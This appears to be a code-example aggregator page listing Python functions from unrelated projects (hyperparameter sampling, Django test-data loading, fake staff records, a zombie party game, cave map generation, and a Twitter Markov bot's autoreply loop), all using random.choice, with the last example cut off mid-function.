        def copy_key(name):
            if name in d:
                sword[name] = d[name]

        copy_key("fireAfterWindup")
        copy_key("firePosition")
        copy_key("weaponType")

        return sword

Example 9

View license
def sample_params(n = None, semi_random_params_key = 'conv_layer_n'):
    """Sample `n` unique hyper-parameter combinations from the module-level
    CONSTS specification, writing progress to stderr.

    Each sampled combination is a dict mapping parameter name to a value (or
    tuple of values for parameters that depend on another parameter's count).
    Parameters listed in SEMI_RANDOM_PARAMS but not actively sampled are
    filled from a lookup keyed by the value of `semi_random_params_key`.

    When `n` is None, all possible combinations (get_possibility_n()) are
    requested; otherwise `n` must not exceed that total.
    """
    if n is None:
        n = get_possibility_n()
    else:
        possibility_n = get_possibility_n()
        assert n <= possibility_n, "%d > %d" %(n, possibility_n)
        
    # `pool` tracks value-tuples already emitted so duplicates are rejected.
    pool = set()
    samples = []
    i = 0

    sys.stderr.write('total: %d\n' %(get_possibility_n()))

    # Keep sampling until n unique combinations are collected.
    while i < n:
        # random hyper parameters        
        params = {}
        for key in CONSTS:
            # Disabled parameters collapse to their single default value
            # (NOTE(review): mutates CONSTS in place, and a falsy default
            # such as 0/False is ignored by this truthiness check — confirm
            # that is intended).
            if not CONSTS[key]['on']:
                if CONSTS[key].get('default'):
                    CONSTS[key]['values'] = [CONSTS[key].get('default')]
                            
            depends_on = CONSTS[key].get('depends_on')
            candidates = CONSTS[key].get('values', [])
            if candidates:
                value = random.choice(candidates)
            else:
                value = None

            if depends_on:                
                # The parameter is a tuple whose length is derived from a
                # previously sampled parameter ("name+k" adds k extra slots).
                if '+' in depends_on: # extra times
                    name, extra_n_str = depends_on.split('+')
                    dup_times = params[name] + int(extra_n_str.strip())
                else:
                    dup_times = params[depends_on]

                if CONSTS[key].get('repeat'):
                    # Same value repeated in every slot.
                    assert value is not None
                    params[key] = tuple([value]) * dup_times
                else:
                    if candidates:
                        # Each slot sampled independently.
                        params[key] = tuple([random.choice(candidates) for _ in xrange(dup_times)])
                    else:
                        params[key] = tuple(range(dup_times)) # fake values to be replaced
            else:
                if isinstance(value, bool): #it's bool, show or hide
                    if value:
                        params[key] = value
                else:
                    assert value is not None
                    params[key] = value
            
            # remedy step that changes the value at specific positions
            if CONSTS[key].has_key('values_at_position'):
                values = [random.choice(candidates) for candidates in CONSTS[key]['values_at_position'].values()]
                positions = CONSTS[key]['values_at_position'].keys()
                params[key] = modify_tuple(params[key], positions, values)

        # Fill in semi-random parameters tied to the key parameter's value.
        for key in SEMI_RANDOM_PARAMS:
            if not (CONSTS.get(key) and CONSTS[key]['on']): #it's not used for sampling
                params[key] = SEMI_RANDOM_PARAMS[key][params[semi_random_params_key]]
            
        # Reject duplicates; only unique combinations count toward n.
        if tuple(params.values()) in pool:
            continue
        else:
            i += 1
            sys.stderr.write("i = %d: %r\n" %(i, params))
            pool.add(tuple(params.values()))
            samples.append(params)
            
    return samples

Example 10

Project: btb
Source File: import_test_data.py
View license
def load_test_data():
    """Populate the database from the MEDIA_ROOT/test/test_data.yaml fixture.

    Creates, in order: the current Site's name/domain, superuser admins,
    organizations with their moderators (and cross-org mail handling),
    then per-user profiles, org memberships, received scans (split into
    documents with comments) and sent letters.  Scan/document tasks are
    run synchronously so everything is fully built when this returns.
    """
    data_file = os.path.join(settings.MEDIA_ROOT, "test", "test_data.yaml")
    uploader = User.objects.get(username='uploader')
    commenter = User.objects.create(username="commenter")
    with open(data_file) as fh:
        data = yaml.safe_load(fh)

    # name -> Organization, filled below and used when attaching users/scans.
    orgs = {}

    print "Setting site..."
    site = Site.objects.get_current()
    site.domain = data['site']['domain']
    site.name = data['site']['name']
    site.save()

    print "Adding admins..."
    for admin_data in data['admins']:
        user, created = User.objects.get_or_create(
                username=admin_data['username'],
                is_superuser=True,
                is_staff=True,
        )
        user.set_password(admin_data['password'])
        user.save()

    print "Adding orgs..."
    for org_data in data['orgs']:
        org, created = Organization.objects.get_or_create(
                name=org_data['name'],
                personal_contact=org_data['personal_contact'],
                slug=slugify(org_data['name']),
                public=org_data['public'],
                mailing_address=org_data['mailing_address'],
                about=org_data.get('about', ''),
                footer=org_data.get('footer', ''),
        )
        orgs[org_data['name']] = org
        for mod_data in org_data['moderators']:
            u, created = User.objects.get_or_create(
                    username=mod_data['username']
            )
            u.set_password(mod_data['password'])
            u.save()
            org.moderators.add(u)
            Group.objects.get(name='moderators').user_set.add(u)
    # Second pass so the referenced mail-handling org already exists.
    for org_data in data['orgs']:
        mail_handled_by = org_data.get('outgoing_mail_handled_by', None)
        if mail_handled_by:
            org = Organization.objects.get(name=org_data['name'])
            mailer = Organization.objects.get(name=mail_handled_by)
            org.outgoing_mail_handled_by = mailer
            org.save()

    print "Building pdfs and users..."
    for user_data in data['users']:
        user, created = User.objects.get_or_create(
                username=slugify(user_data['name'])
        )
        # Managed (incarcerated) users get a synthetic prison address.
        if user_data.get('managed', False):
            random_mailing_address = "\n".join([
                # Prisoner number
                "#%s" % "".join(random.choice(string.digits) for a in range(8)),
                # Street
                "%s Cherry Tree Lane" % "".join(
                    random.choice(string.digits) for a in range(3)),
                # City, state, zip
                "City Name, %s  %s" % (
                    random.choice(US_STATES)[0],
                    "".join(random.choice(string.digits) for a in range(5)),
                )
            ])
        else:
            random_mailing_address = ""

        user.profile.display_name = user_data['name']
        user.profile.mailing_address = random_mailing_address
        user.profile.blogger = user_data.get('blogger', False)
        user.profile.managed = user_data.get('managed', False)
        user.profile.consent_form_received = user_data.get('consent_form_received', False)
        user.profile.blog_name = user_data.get('blog_name', None) or ''
        user.profile.save()

        for org_name in user_data['orgs']:
            orgs[org_name].members.add(user)

        for corresp in user_data['correspondence']:
            direction, content = corresp.items()[0]
            if direction == "received":
                # Build Scan
                pdf = build_pdf(content['parts'], user.profile) 
                path = tasks.move_scan_file(filename=pdf)
                # NOTE(review): org_name leaks from the user_data['orgs']
                # loop above, so scans are attributed to the user's *last*
                # listed org — confirm this is intended.
                scan = Scan.objects.create(
                        uploader=uploader,
                        org=orgs[org_name],
                        author=user,
                        pdf=os.path.relpath(path, settings.MEDIA_ROOT),
                        under_construction=True,
                        processing_complete=True,
                        created=content['date'])
                # execute synchronously
                tasks.split_scan(scan_id=scan.pk)
                # Build Documents
                page_count = 1 # ignore envelope
                for part in content['parts']:
                    page_count += part["pages"]
                    if part["type"] == "ignore":
                        continue
                    document = Document.objects.create(
                            scan=scan,
                            editor=uploader,
                            author=user,
                            type=part["type"],
                            date_written=content["date"],
                            created=content["date"],
                            title=part.get("title", None) or "",
                    )
                    # Attach this part's page range to the document in order.
                    for i, page_index in enumerate(
                            range(page_count - part["pages"], page_count)):
                        scanpage = scan.scanpage_set.get(order=page_index)
                        DocumentPage.objects.create(
                                document=document,
                                scan_page=scanpage,
                                order=i)
                    # execute synchronously
                    if part["type"] in ("profile", "post"):
                        document.status = "published"
                    else:
                        document.status = "unpublishable"
                    document.highlight_transform = '{"document_page_id": %s, "crop": [44.5, 58.66667175292969, 582.5, 288.6666717529297]}' % document.documentpage_set.all()[0].pk
                    document.save()
                    tasks.update_document_images(document.pk)
                    # One lorem-ipsum comment per entry; only the date varies.
                    for comment in part.get('comments', []):
                        Comment.objects.create(
                                user=commenter,
                                comment="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec a diam lectus. Sed sit amet ipsum mauris. Maecenas congue ligula ac quam viverra nec consectetur ante hendrerit. Donec et mollis dolor. Praesent et diam eget libero egestas mattis sit amet vitae augue. Nam tincidunt congue enim, ut porta lorem lacinia consectetur. Donec ut libero sed arcu vehicula ultricies a non tortor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aenean ut gravida lorem. Ut turpis felis, pulvinar a semper sed, adipiscing id dolor. Pellentesque auctor nisi id magna consequat sagittis.",
                                document=document,
                                created=comment['date'],
                        )
        # Finish received scans before parsing letters, to ensure comments/etc
        # are there yet.
        for corresp in user_data['correspondence']:
            direction, content = corresp.items()[0]
            if direction == "sent":
                letter = Letter(type=content['type'], 
                        auto_generated=True, 
                        sender=uploader,
                        created=content['date'],
                        sent=content['date'],
                        recipient=user,
                        org=Organization.objects.get(name=user_data['orgs'][0]))
                if content['type'] == "comments":
                    # A comments letter bundles all unmailed comments on the
                    # user's documents dated before this letter.
                    letter.save()
                    comments = Comment.objects.unmailed().filter(
                            document__author=user,
                            created__lt=content['date']
                    )
                    for comment in comments:
                        letter.comments.add(comment)
                elif content['type'] == "letter":
                    letter.body = content['body']
                letter.save()

Example 11

Project: ulakbus
Source File: fake_data_generator.py
View license
    @staticmethod
    def yeni_personel(personel_turu=1, unit='', personel_say=1, user=None):
        """Create and save new Personel records filled with fake data.

        Combines random/fake generators with the given arguments to
        build ``personel_say`` staff records, saving each one.

        Args:
            personel_turu (Personel): Staff type.
            unit (Unit): Unit the staff member belongs to.
            personel_say: Number of staff records to create.
            user: User to attach to the staff record; when omitted a new
                fake user is created per record.

        Returns:
            Personel: List of the newly created staff records.

        """

        personel_list = []

        for i in range(personel_say):
            p = Personel()
            p.tckn = ints(length=11)
            p.ad = fake.first_name()
            p.soyad = fake.last_name()
            p.cinsiyet = gender()
            p.uyruk = fake.country()
            # NOTE: the original also assigned
            # `p.medeni_hali = marital_status(student=False)` here, but it
            # was unconditionally overwritten further below; the dead
            # assignment has been removed.
            p.ikamet_adresi = fake.address()
            p.ikamet_il = fake.state()
            p.ikamet_ilce = fake.state()
            p.adres_2 = fake.address()
            p.oda_no = fake.classroom_code()
            p.oda_tel_no = fake.phone_number()
            p.cep_telefonu = fake.phone_number()
            p.e_posta = fake.email()
            p.e_posta_2 = fake.email()
            p.e_posta_3 = fake.email()
            p.web_sitesi = "http://%s" % fake.domain_name()
            p.yayinlar = '\n'.join(fake.paragraphs())
            p.projeler = '\n'.join(fake.paragraphs())
            p.kan_grubu = blood_type()
            p.ehliyet = driver_license_class()
            p.verdigi_dersler = '\n'.join([fake.lecture() for _ in range(3)])
            p.unvan = random.choice(range(1, 5))
            p.biyografi = '\n'.join(fake.paragraphs(5))
            p.notlar = '\n'.join(fake.paragraphs(1))
            p.personel_turu = personel_turu
            p.cuzdan_seri = id_card_serial()
            p.cuzdan_seri_no = ints(length=10)
            p.baba_adi = fake.first_name_male()
            p.ana_adi = fake.first_name_female()
            p.dogum_tarihi = birth_date(student=False)
            p.dogum_yeri = fake.state()
            p.medeni_hali = random.choice(['1', '2'])
            p.hizmet_sinifi = random.choice(range(1, 30))
            p.birim = unit
            # Term start is 1-29 days in the past; end and promotion dates
            # are 1-29 days in the future.
            p.gorev_suresi_baslama = (datetime.datetime.now() - datetime.timedelta(
                days=random.choice(range(1, 30))))
            p.goreve_baslama_tarihi = p.gorev_suresi_baslama

            p.gorev_suresi_bitis = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))

            p.kh_sonraki_terfi_tarihi = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))
            p.ga_sonraki_terfi_tarihi = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))
            p.em_sonraki_terfi_tarihi = (datetime.datetime.now() + datetime.timedelta(
                days=random.choice(range(1, 30))))

            p.kazanilmis_hak_derece = random.randint(1, 7)
            p.kazanilmis_hak_kademe = random.randint(1, 8)
            p.kazanilmis_hak_ekgosterge = random.randint(1000, 3000)

            p.gorev_ayligi_derece = random.randint(1, 7)
            p.gorev_ayligi_kademe = random.randint(1, 8)
            p.gorev_ayligi_ekgosterge = random.randint(1000, 3000)

            p.emekli_muktesebat_derece = random.randint(1, 7)
            p.emekli_muktesebat_kademe = random.randint(1, 8)
            p.emekli_muktesebat_ekgosterge = random.randint(1000, 3000)

            p.gorunen_gorev_ayligi_kademe = random.randint(1, 8)
            p.gorunen_kazanilmis_hak_kademe = random.randint(1, 8)

            # Attach the given user, or mint a fresh fake user from the name.
            if user:
                p.user = user
            else:
                username = fake.slug(u'%s-%s' % (p.ad, p.soyad))
                n_user = new_user(username=username)
                p.user = n_user

            p.save()
            personel_list.append(p)
        return personel_list

Example 12

Project: NaNoGenLab
Source File: ending-concordance.py
View license
def main(argv):
    """Print random word-pairings grouped by shared two-letter endings.

    Reads every file named on the command line, indexes words longer
    than four characters (stripped of surrounding punctuation) by their
    final two letters, then prints ten lines of ten word pairs drawn
    from ending-groups containing at least 15 distinct words.
    """
    filenames = argv[1:]

    words = []

    # Collect every whitespace-separated token, also splitting on '--'.
    for filename in tqdm(filenames):
        with open(filename, 'r') as f:
            for line in f:
                bits = line.strip().split()
                for bit in bits:
                    words.extend(bit.split('--'))

    # Map "last two letters" -> set of words with that ending.
    index = {}
    for word in words:
        # Strip trailing punctuation, then surrounding quotes/parens,
        # then trailing punctuation again (handles e.g. `word."`).
        if word.endswith(('.', '!', '?', ';', ',')):
            word = word[:-1]
        if word.startswith(('"', "'", '(')):
            word = word[1:]
        if word.endswith(('"', "'", ')')):
            word = word[:-1]
        if word.endswith(('.', '!', '?', ';', ',')):
            word = word[:-1]
        #sys.stdout.write(word + ' ')
        if len(word) > 4:
            index.setdefault(word[-2:], set()).add(word)

    # Only endings with a reasonably large pool are worth sampling from.
    pick_from = []
    for key, s in index.iteritems():
        if len(s) >= 15:  # say
            pick_from.append(key)

    for i in xrange(0, 10):
        pick1 = list(index[random.choice(pick_from)])
        pick2 = list(index[random.choice(pick_from)])
        for j in xrange(0, 10):
            sys.stdout.write(random.choice(pick1) + ' ')
            sys.stdout.write(random.choice(pick2) + ' ')
        sys.stdout.write('!\n\n')

    sys.exit(0)
    # NOTE: ~60 lines of unreachable code followed the unconditional
    # sys.exit(0) above; it referenced undefined names (`sentences`,
    # `sentence`, `sentencify`, `DEBUG`) and has been removed as dead code.
Example 13

Project: JoustMania
Source File: zombie.py
View license
    def Start(self):
        """Run one round of the zombie game until a side wins.

        Spawns one tracking subprocess per living controller, plays
        background music, seeds the round by turning two random humans
        into zombies, then loops: handling human deaths and weapon fire,
        respawning dead zombies after a delay, and ending the round when
        all humans are dead or the survival timer expires.
        """
        running = True
        moves = []
        # One move object per living controller, in controller order.
        for move_num in range(len(self.controllers_alive)):
            moves.append(common.get_move(self.controllers_alive[move_num], move_num))

        serials = self.controllers_alive
        processes = []
        
        # Shared int array per controller communicates with its tracker
        # subprocess.  Slot meanings as used below: [1] = weapon fired,
        # [3] = alive flag, [4] = starting bullets.
        # NOTE(review): slot semantics are inferred from usage here —
        # confirm against track_controller.
        for num_try, serial in enumerate(serials):
            starting_bullets = 0
            #starting_bullets = random.choice([0, 1])
            opts = Array('i', [0, 0, 0, 1, starting_bullets, 1, 1])
            p = Process(target=track_controller, args=(serial, num_try, opts))
            p.start()
            processes.append(p)
            self.controller_opts[serial] = opts
            self.humans.append(serial)
            

        # Sound effects; background music is optional (folder may be empty).
        human_victory = Audio('audio/Zombie/sound_effects/human_victory.wav')
        zombie_victory = Audio('audio/Zombie/sound_effects/zombie_victory.wav')
        death = Audio('audio/Zombie/sound_effects/zombie_death.wav')
        pistol = Audio('audio/Zombie/sound_effects/pistol.wav')
        shotgun = Audio('audio/Zombie/sound_effects/shotgun.wav')
        molotov = Audio('audio/Zombie/sound_effects/molotov.wav')
        try:
            music = Audio('audio/Zombie/music/' + random.choice(os.listdir('audio/Zombie/music/')))
            music.start_effect_music()
        except:
            print('no music in audio/Zombie/music/')

        # Grace period before the first infections.
        start_kill = time.time() + 5
        while time.time() < start_kill:
            pass

        #kill first humans
        for i in range(2):
            random_human = random.choice(self.humans)
            self.controller_opts[random_human][3] = 0
        
        while running:
            self.audio_cue()
            #human update, loop through the different human controllers
            for serial in self.humans:
                #human is dead and now a zombie
                if self.controller_opts[serial][3] == 0:
                    self.controller_opts[serial][0] = 1
                    self.dead_zombies[serial] = time.time() + self.get_kill_time()
                    
                #pistol fired(1 bullet 1 random alive zombie)
                elif self.controller_opts[serial][1] == 2:
                    pistol.start_effect()
                    self.kill_zombies(1, [0, 0, 0, 0, 1, 1, 1])
                    self.controller_opts[serial][1] = 0
                            

                #shotgun fired(2 bullets 3 random alive zombies)
                #elif self.controller_opts[serial][1] == 3:
                #    shotgun.start_effect()
                #    self.kill_zombies(3, [ 0, 0, 1, 1, 2])
                #    self.controller_opts[serial][1] = 0


                #molotov fired(5 bullets all alive zombies)
                elif self.controller_opts[serial][1] == 4:
                    molotov.start_effect()
                    self.kill_zombies(20, [0, 0, 1, 1, 2, 3])
                    self.controller_opts[serial][1] = 0

                    
            # Respawn dead zombies whose timer has expired.
            for serial, spawn_time in self.dead_zombies.items():
                if serial in self.humans:
                    self.humans.remove(serial)
                if spawn_time < time.time():
                    #set zombie to alive
                    self.controller_opts[serial][3] = 1
                    self.alive_zombies.append(serial)

            #loop through dead zombies
            for serial in self.alive_zombies:
                if serial in self.dead_zombies:
                    del self.dead_zombies[serial]

                #melee
                if self.controller_opts[serial][3] == 0:
                    self.controller_opts[serial][0] = 1
                    self.dead_zombies[serial] = time.time() + self.get_kill_time()
                    self.alive_zombies.remove(serial)
                    self.reward([0, 0, 1, 1, 2])
                    death.start_effect()

            #win scenario
            if len(self.humans) <= 0 or (time.time() - self.start_time) > self.win_time:
                # Tear down the tracker subprocesses before celebrating.
                for proc in processes:
                    proc.terminate()
                    proc.join()
                pause_time = time.time() + 3
                # Rainbow colour cycle for the winners' LEDs.
                HSV = [(x*1.0/(50*len(self.controllers_alive)), 0.9, 1) for x in range(50*len(self.controllers_alive))]
                colour_range = [[int(x) for x in common.hsv2rgb(*colour)] for colour in HSV]
                win_controllers = []
                if len(self.humans) <= 0:
                    zombie_victory.start_effect()
                    self.alive_zombies.extend(self.dead_zombies.keys())
                    win_controllers = self.alive_zombies
                if (time.time() - self.start_time) > self.win_time:
                    human_victory.start_effect()
                    win_controllers = self.humans
                #This needs to go in its own function
                # Winners cycle rainbow LEDs; losers rumble with LEDs off.
                while time.time() < pause_time:
                    for win_move in moves:
                        if win_move.get_serial() in win_controllers:
                            win_move.set_leds(*colour_range[0])
                            colour_range.append(colour_range.pop(0))
                            win_move.update_leds()
                        else:
                            win_move.set_rumble(100)
                            win_move.poll()
                            win_move.set_leds(0, 0, 0)
                            win_move.update_leds()
                    time.sleep(0.01)
                running = False
                try:
                    music.stop_effect_music()
                except:
                    print('no audio loaded')

Example 14

Project: flax
Source File: fractor.py
View license
    def generate(self):
        """Generate a cave map containing a central, partially-ruined room.

        Carves a cave system around a rectangular room placed near the
        region's center, draws a gate in the middle of a randomly chosen
        left/right wall, damages the wall near the gate, and punches one
        extra breach from the room into the adjacent cave.
        """
        self.map_canvas.clear(Floor)

        # So what I want here is to have a cave system with a room in the
        # middle, then decay the room.
        # Some constraints:
        # - the room must have a wall where the entrance could go, which faces
        # empty space
        # - a wall near the entrance must be destroyed
        # - the player must start in a part of the cave connected to the
        # destroyed entrance
        # - none of the decay applied to the room may block off any of its
        # interesting features

        # TODO it would be nice if i could really write all this without ever
        # having to hardcode a specific direction, so the logic could always be
        # rotated freely
        side = random.choice([Direction.left, Direction.right])

        # TODO assert region is big enough
        # Room is roughly 40% of the region on each axis, at least ~9 tiles.
        room_size = Size(
            random_normal_range(9, int(self.region.width * 0.4)),
            random_normal_range(9, int(self.region.height * 0.4)),
        )

        # Center the room, then jitter it by up to ~10% of the region size.
        room_position = self.region.center() - room_size // 2
        room_position += Point(
            random_normal_int(0, self.region.width * 0.1),
            random_normal_int(0, self.region.height * 0.1),
        )

        room_rect = Rectangle(room_position, room_size)
        self.room_region = room_rect

        room = Room(room_rect)

        # Caves fill everything outside the room's rectangle.
        cave_area = (
            Blob.from_rectangle(self.region)
            - Blob.from_rectangle(room_rect)
        )
        self.cave_region = cave_area
        # Force walls along the region border and floor just outside the
        # entrance-side of the room, so the cave connects to the gate.
        walls = [point for (point, _) in self.region.iter_border()]
        floors = []
        for point, edge in room_rect.iter_border():
            if edge is side or edge.adjacent_to(side):
                floors.append(point)
                floors.append(point + side)
        generate_caves(
            self.map_canvas, cave_area, CaveWall,
            force_walls=walls, force_floors=floors,
        )

        room.draw_to_canvas(self.map_canvas)

        # OK, now draw a gate in the middle of the side wall
        if side is Direction.left:
            x = room_rect.left
        else:
            x = room_rect.right
        mid_y = room_rect.top + room_rect.height // 2
        # Gate is 3 tiles tall (odd-height room) or 4 (even-height room).
        if room_rect.height % 2 == 1:
            min_y = mid_y - 1
            max_y = mid_y + 1
        else:
            min_y = mid_y - 2
            max_y = mid_y + 1
        for y in range(min_y, max_y + 1):
            self.map_canvas.set_architecture(Point(x, y), KadathGate)

        # Beat up the border of the room near the gate
        # Pick a wall tile on the gate's side but outside the gate itself.
        y = random.choice(
            tuple(range(room_rect.top, min_y))
            + tuple(range(max_y + 1, room_rect.bottom))
        )
        # Rubble in a 5x5 patch; damage falls off with Manhattan distance.
        for dx in range(-2, 3):
            for dy in range(-2, 3):
                point = Point(x + dx, y + dy)
                # TODO i think what i may want is to have the cave be a
                # "Feature", where i can check whether it has already claimed a
                # tile, or draw it later, or whatever.
                if self.map_canvas._arch_grid[point] is not CaveWall:
                    distance = abs(dx) + abs(dy)
                    ruination = random_normal_range(0, 0.2) + distance * 0.2
                    self.map_canvas.set_architecture(
                        point, e.Rubble(Breakable(ruination)))

        # And apply some light ruination to the inside of the room
        # Find a border tile whose outside neighbour is cave, then breach it.
        border = list(room_rect.iter_border())
        # TODO don't do this infinitely; give up after x tries
        while True:
            point, edge = random.choice(border)
            if self.map_canvas._arch_grid[point + edge] is CaveWall:
                break
        self.map_canvas.set_architecture(point, CaveWall)
        self.map_canvas.set_architecture(point - edge, CaveWall)
        # TODO this would be neater if it were a slightly more random pattern
        for direction in (
                Direction.up, Direction.down, Direction.left, Direction.right):
            self.map_canvas.set_architecture(
                point - edge + direction, CaveWall)

Example 15

Project: markovbot
Source File: markovbot.py
View license
	def _autoreply(self):
		
		"""Continuously monitors Twitter Stream and replies when a tweet
		appears that matches self._targetstring. It will include
		self._tweetprefix and self._tweetsuffix in the tweets, provided they
		are not None.
		"""
		
		# Run indefinitively
		while self._autoreplythreadlives:

			# Wait a bit before rechecking whether autoreplying should be
			# started. It's highly unlikely the bot will miss something if
			# it is a second late, and checking continuously is a waste of
			# resource.
			time.sleep(1)

			# Only start when the bot logs in to twitter, and when a
			# target string is available
			if self._loggedin and self._targetstring != None:
	
				# Acquire the TwitterStream lock
				self._tslock.acquire(True)
	
				# Create a new iterator from the TwitterStream
				iterator = self._ts.statuses.filter(track=self._targetstring)
				
				# Release the TwitterStream lock
				self._tslock.release()
	
				# Only check for tweets when autoreplying
				while self._autoreplying:
					
					# Get a new Tweet (this will block until a new
					# tweet becomes available, but can also raise a
					# StopIteration Exception every now and again.)
					try:
						# Attempt to get the next tweet.
						tweet = iterator.next()
					except StopIteration:
						# Restart the iterator, and skip the rest of
						# the loop.
						iterator = self._ts.statuses.filter(track=self._targetstring)
						continue
					
					# Restart the connection if this is a 'hangup'
					# notification, which will be {'hangup':True}
					if u'hangup' in tweet.keys():
						# Reanimate the Twitter connection.
						self._twitter_reconnect()
						# Skip further processing.
						continue
					
					# Store a copy of the latest incoming tweet, for
					# debugging purposes
					self._lasttweetin = copy.deepcopy(tweet)
					
					# Only proceed if autoreplying is still required (there
					# can be a delay before the iterator produces a new, and
					# by that time autoreplying might already be stopped)
					if not self._autoreplying:
						# Skip one cycle, which will likely also make the
						# the while self._autoreplying loop stop
						continue

					# Report to console
					self._message(u'_autoreply', u"I've found a new tweet!")
					try:
						self._message(u'_autoreply', u'%s (@%s): %s' % \
							(tweet[u'user'][u'name'], \
							tweet[u'user'][u'screen_name'], tweet[u'text']))
					except:
						self._message(u'_autoreply', \
							u'Failed to report on new Tweet :(')
					
					# Don't reply to this bot's own tweets
					if tweet[u'user'][u'id_str'] == self._credentials[u'id_str']:
						# Skip one cycle, which will bring us to the
						# next tweet
						self._message(u'_autoreply', \
							u"This tweet was my own, so I won't reply!")
						continue
					
					# Don't reply to retweets
					if u'retweeted_status' in tweet.keys():
						# Skip one cycle, which will bring us to the
						# next tweet
						self._message(u'_autoreply', \
							u"This was a retweet, so I won't reply!")
						continue

					# Don't reply to tweets that are in the nono-list
					if tweet[u'id_str'] in self._nonotweets:
						# Skip one cycle, which will bring us to the
						# next tweet
						self._message(u'_autoreply', \
							u"This tweet was in the nono-list, so I won't reply!")
						continue

					# Skip tweets that are too deep into a conversation
					if self._maxconvdepth != None:
						# Get the ID of the tweet that the current tweet
						# was a reply to
						orid = tweet[u'in_reply_to_status_id_str']
						# Keep digging through the tweets until the the
						# top-level tweet is found, or until we pass the
						# maximum conversation depth
						counter = 0
						while orid != None and orid not in self._nonotweets:
							# If the current in-reply-to-ID is not None,
							# the current tweet was a reply. Increase
							# the reply counter by one.
							ortweet = self._t.statuses.show(id=orid)
							orid = ortweet[u'in_reply_to_status_id_str']
							counter += 1
							# Stop counting when the current value
							# exceeds the maximum allowed depth
							if counter >= self._maxconvdepth:
								# Add the current tweets ID to the list
								# of tweets that this bot should not
								# reply to. (Keeping track prevents
								# excessive use of the Twitter API by
								# continuously asking for the
								# in-reply-to-ID of tweets)
								self._nonotweets.append(orid)
						# Don't reply if this tweet is a reply in a tweet
						# conversation of more than self._maxconvdepth tweets,
						# or if the tweet's ID is in this bot's list of
						# tweets that it shouldn't reply to
						if counter >= self._maxconvdepth or \
							orid in self._nonotweets:
							self._message(u'_autoreply', \
								u"This tweet is part of a conversation, and I don't reply to conversations with over %d tweets." % (self._maxconvdepth))
							continue
					
					# Detect the language of the tweet, if the
					# language of the reply depends on it.
					if self._autoreply_database == u'auto-language':
						# Get the language of the tweet, or default
						# to English if it isn't available.
						if u'lang' in tweet.keys():
							lang = tweet[u'lang'].lower()
							self._message(u'_autoreply', u"I detected language: '%s'." % (lang))
						else:
							lang = u'en'
							self._message(u'_autoreply', u"I couldn't detect the language, so I defaulted to '%s'." % (lang))
						# Check if the language is available in the
						# existing dicts. Select the associated
						# database, or default to English when the
						# detected language isn't available, or
						# default to u'default' when English is not
						# available.
						if lang in self.data.keys():
							database = lang
							self._message(u'_autoreply', u"I chose database: '%s'." % (database))
						elif u'en' in self.data.keys():
							database = u'en'
							self._message(u'_autoreply', u"There was no database for detected language '%s', so I defaulted to '%s'." % (lang, database))
						else:
							database = u'default'
							self._message(u'_autoreply', u"There was no database for detected language '%s', nor for 'en', so I defaulted to '%s'." % (lang, database))
					# Randomly choose a database if a random database
					# was requested. Never use an empty database,
					# though (the while loop prevents this).
					elif self._autoreply_database == u'random-database':
						database = random.choice(self.data.keys())
						while self.data[database] == {}:
							database = random.choice(self.data.keys())
						self._message(u'_autoreply', \
							u'Randomly chose database: %s' % (database))
					# Randomly choose a database out of a list of
					# potential databases.
					elif type(self._autoreply_database) in [list, tuple]:
						database = random.choice(self._autoreply_database)
						self._message(u'_autoreply', \
							u'Randomly chose database: %s' % (database))
					# Use the preferred database.
					elif type(self._autoreply_database) in [str, unicode]:
						database = copy.deepcopy(self._autoreply_database)
						self._message(u'_autoreply', \
							u'Using database: %s' % (database))
					# If none of the above options apply, default to
					# the default database.
					else:
						database = u'default'
						self._message(u'_autoreply', \
							u'Defaulted to database: %s' % (database))
					
					# If the selected database is not a string, or if
					# it is empty, then fall back on the default
					# database.
					if type(database) not in [str, unicode]:
						self._message(u'_autoreply', \
							u"Selected database '%s' is invalid, defaulting to: %s" % (database, u'default'))
						database = u'default'
					elif database not in self.data.keys():
						self._message(u'_autoreply', \
							u"Selected database '%s' does not exist, defaulting to: %s" % (database, u'default'))
						database = u'default'
					elif self.data[database] == {}:
						self._message(u'_autoreply', \
							u"Selected database '%s' is empty, defaulting to: %s" % (database, u'default'))
						database = u'default'
	
					# Separate the words in the tweet
					tw = tweet[u'text'].split()
					# Clean up the words in the tweet
					for i in range(len(tw)):
						# Remove clutter
						tw[i] = tw[i].replace(u'@',u''). \
							replace(u'#',u'').replace(u'.',u''). \
							replace(u',',u'').replace(u';',u''). \
							replace(u':',u'').replace(u'!',u''). \
							replace(u'?',u'').replace(u"'",u'')

					# Make a list of potential seed words in the tweet
					seedword = []
					if self._keywords != None:
						for kw in self._keywords:
							# Check if the keyword is in the list of
							# words from the tweet
							if kw in tw:
								seedword.append(kw)
					# If there are no potential seeds in the tweet, None
					# will lead to a random word being chosen
					if len(seedword) == 0:
						seedword = None
					# Report back on the chosen keyword
					self._message(u'_autoreply', u"I found seedwords: '%s'." % (seedword))

					# Construct a prefix for this tweet, which should
					# include the handle ('@example') of the sender
					if self._tweetprefix == None:
						prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
					else:
						# Use the specified prefix.
						if type(self._tweetprefix) in [str, unicode]:
							prefix = u'@%s %s' % \
								(tweet[u'user'][u'screen_name'], \
								self._tweetprefix)
						# Randomly choose one of the specified
						# prefixes.
						elif type(self._tweetprefix) in [list, tuple]:
							prefix = u'@%s %s' % \
								(tweet[u'user'][u'screen_name'], \
								random.choice(self._tweetprefix))
						# Fall back on the default option.
						else:
							prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
							self._message(u'_autoreply', \
								u"Could not recognise the type of prefix '%s'; using no prefix." % (self._tweetprefix))

					# Construct a suffix for this tweet. We use the
					# specified prefix, which can also be None. Or
					# we randomly select one from a list of potential
					# suffixes.
					if self._tweetsuffix == None:
						suffix = copy.deepcopy(self._tweetprefix)
					elif type(self._tweetsuffix) in [str, unicode]:
						suffix = copy.deepcopy(self._tweetprefix)
					elif type(self._tweetprefix) in [list, tuple]:
						suffix = random.choice(self._tweetprefix)
					else:
						suffix = None
						self._message(u'_autoreply', \
							u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetsuffix))

					# Construct a new tweet
					response = self._construct_tweet(database=database, \
						seedword=None, prefix=prefix, suffix=suffix)

					# Acquire the twitter lock
					self._tlock.acquire(True)
					# Reply to the incoming tweet
					try:
						# Post a new tweet
